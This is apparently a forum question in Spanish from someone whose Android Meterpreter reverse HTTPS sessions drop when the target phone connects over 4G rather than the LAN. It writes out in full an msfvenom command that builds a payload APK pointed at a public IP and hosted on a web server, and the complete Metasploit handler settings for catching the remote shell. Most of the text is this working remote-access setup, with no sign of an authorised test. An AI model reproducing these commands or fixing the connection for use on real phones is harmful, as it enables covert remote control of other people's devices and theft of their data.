Cada vez que uso un https invertido del medidor de metro en un teléfono Android a través de Internet, se crea una sesión, pero después de unos segundos dice que la sesión no es válida y se cierra. Cuando lo hago en la LAN funciona bien. Entonces, ¿cuál es el problema? (El teléfono en el que estoy probando la carga útil está utilizando una conexión 4G)
Cuando creo la carga útil que uso:
msfvenom -p android/meterpreter/reverse_https LPORT=4444 LHOST=<public_ip> -o /var/www/html/payload.apk.
En metasploit yo uso:
use exploit/multi/handler
set payload android/meterpreter/reverse_https
set lport 4444
set lhost local ip
set luri /
set ExitOnSession false
set SessionCommunicationTimeout 0
set SessionExpirationTimeout 0
exploit -j
Después de todo esto se establece una conexión pero luego se cierra. Y a veces, cuando creo un nuevo controlador, se crean sesiones infinitas para el mismo objetivo, solo se siguen creando hasta que cierre la consola, ¿puede alguien ayudarme?